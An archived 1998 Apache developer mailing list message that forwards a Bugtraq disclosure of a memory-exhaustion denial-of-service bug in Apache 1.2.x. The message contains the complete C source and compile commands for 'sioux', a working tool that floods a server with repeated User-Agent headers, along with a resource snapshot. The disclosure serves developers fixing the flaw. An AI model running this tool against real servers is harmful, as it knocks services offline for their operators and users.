httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Brian Behlendorf <br...@hyperreal.org>
Subject Fwd: YA Apache DoS attack
Date Fri, 07 Aug 1998 22:21:00 GMT
>Delivered-To: brian@HYPERREAL.ORG
>Approved-By: aleph1@DFW.NET
>Lines: 176
>X-Mailer: Gnus v5.3/Emacs 19.34
>Date:	Fri, 7 Aug 1998 19:04:27 +0200
>Reply-To: Dag-Erling Coidan Smørgrav <finrod@EWOX.ORG>
>Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
>From:	Dag-Erling Coidan Smørgrav <finrod@EWOX.ORG>
>Subject:      YA Apache DoS attack
>To:	BUGTRAQ@NETSPACE.ORG
>
>There seems to be a simple way of badly DoSing any Apache server. It
>involved a massive memory leak in the way it handles incoming request
>headers. I based my exploit on the assumption that they use setenv()
>(which they don't) and that the bug occurs when you send a header that
>will end up as an environment variable if you request a CGI script
>(such as User-Agent), but I have since verified that there is no
>connection there. Anyway, you can blow Apache through the roof by
>sending it tons of headers - the server's memory consumption seems to
>be a steep polynomial of the amount of data you send it. Below is a
>snapshot of top(1) about one minute after I sent my server a request
>with 10,000 copies of "User-Agent: sioux\r\n" (totalling 190,016 bytes
>of data)
>
>---cut---
>last pid: 29187;  load averages:  1.82,  1.06,  0.68
18:21:36
>82 processes:  2 running, 80 sleeping
>CPU states: 93.5% user,  0.0% nice,  6.1% system,  0.4% interrupt,  0.0% idle
>Mem: 82M Active, 5692K Inact, 31M Wired, 4572K Cache, 8349K Buf, 616K Free
>Swap: 512M Total, 402M Used, 110M Free, 79% Inuse, 5412K In, 748K Out
>
>  PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
>29176 www      -18   0   392M 85612K swread   0:57  6.83%  6.83% httpd
>---cut---
>
>I know that there are many trivial ways of overloading a web server
>(e.g. opening tons of connection to eat up file descriptors and
>process slots), but this one seemed a little extreme, to say the
>least.
>
>Please note that I've only tested this on Apache 1.2.5 and 1.2.6, not
>on 1.3.1. However, there is no mention of this bug in the change log
>for 1.3.1, so I'll assume it's vulnerable.
>
>BTW, how can the Apache team be stupid enough not to provide a way of
>submitting problem reports by email? If they did, I'd've sent this to
>them first and given them a week, but they don't and I'm too friggin'
>lazy to use their web interface...
>
>Here's the 'sploit for the script kiddies. It should compile cleanly
>and work on most Unices. These are the ones I've tested it on:
>
>FreeBSD 2.2.x, FreeBSD 3.0, IRIX 5.3, IRIX 6.2:
>  gcc -o sioux sioux.c
>
>Solaris 2.5.1:
>  gcc -o sioux sioux.c -lsocket -lnsl
>
>
>---cut---
>/*-
> * Copyright (c) 1998 Dag-Erling Coïdan Smørgrav
> * All rights reserved.
> *
> * Redistribution and use in source and binary forms, with or without
> * modification, are permitted provided that the following conditions
> * are met:
> * 1. Redistributions of source code must retain the above copyright
> *    notice, this list of conditions and the following disclaimer
> *    in this position and unchanged.
> * 2. Redistributions in binary form must reproduce the above copyright
> *    notice, this list of conditions and the following disclaimer in the
> *    documentation and/or other materials provided with the distribution.
> * 3. The name of the author may not be used to endorse or promote products
> *    derived from this software withough specific prior written permission
> *
> * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
> * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
> * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
> * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
> * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
> * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
> * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
> * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
> * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
> * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
> *
> */
>
>/*
> * Kudos to Mark Huizer who originally suggested this on freebsd-current
> */
>
>#include <sys/types.h>
>
>#include <sys/socket.h>
>#include <netinet/in.h>
>
>#include <netdb.h>
>#include <stdio.h>
>#include <stdlib.h>
>#include <string.h>
>#include <unistd.h>
>
>void
>usage(void)
>{
>    fprintf(stderr, "usage: sioux [-a address] [-p port] [-n num]\n");
>    exit(1);
>}
>
>int
>main(int argc, char *argv[])
>{
>    struct sockaddr_in sin;
>    struct hostent *he;
>    FILE *f;
>    int o, sd;
>
>    /* default parameters */
>    char *addr = "localhost";
>    int port = 80;
>    int num = 1000;
>
>    /* get options */
>    while ((o = getopt(argc, argv, "a:p:n:")) != EOF)
>        switch (o) {
>        case 'a':
>            addr = optarg;
>            break;
>        case 'p':
>            port = atoi(optarg);
>            break;
>        case 'n':
>            num = atoi(optarg);
>            break;
>        default:
>            usage();
>        }
>
>    if (argc != optind)
>        usage();
>
>    /* connect */
>    if ((he = gethostbyname(addr)) == NULL) {
>        perror("gethostbyname");
>        exit(1);
>    }
>    bzero(&sin, sizeof(sin));
>    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
>    sin.sin_family = he->h_addrtype;
>    sin.sin_port = htons(port);
>
>    if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
>        perror("socket");
>        exit(1);
>    }
>
>    if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
>        perror("connect");
>        exit(1);
>    }
>
>    if ((f = fdopen(sd, "r+")) == NULL) {
>        perror("fdopen");
>        exit(1);
>    }
>
>    /* attack! */
>    fprintf(stderr, "Going down like a plague of locusts on %s\n", addr);
>    fprintf(f, "GET / HTTP/1.1\r\n");
>    while (num-- && !ferror(f))
>        fprintf(f, "User-Agent: sioux\r\n");
>
>    if (ferror(f)) {
>        perror("fprintf");
>        exit(1);
>    }
>
>    fclose(f);
>    exit(0);
>}
>---cut---
>
>DES
>--
>Dag-Erling Smørgrav -- finrod@ewox.org
> 
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
"Common sense is the collection of prejudices  |     brian@apache.org
acquired by the age of eighteen." - Einstein   |  brian@hyperreal.org

Mime
View raw message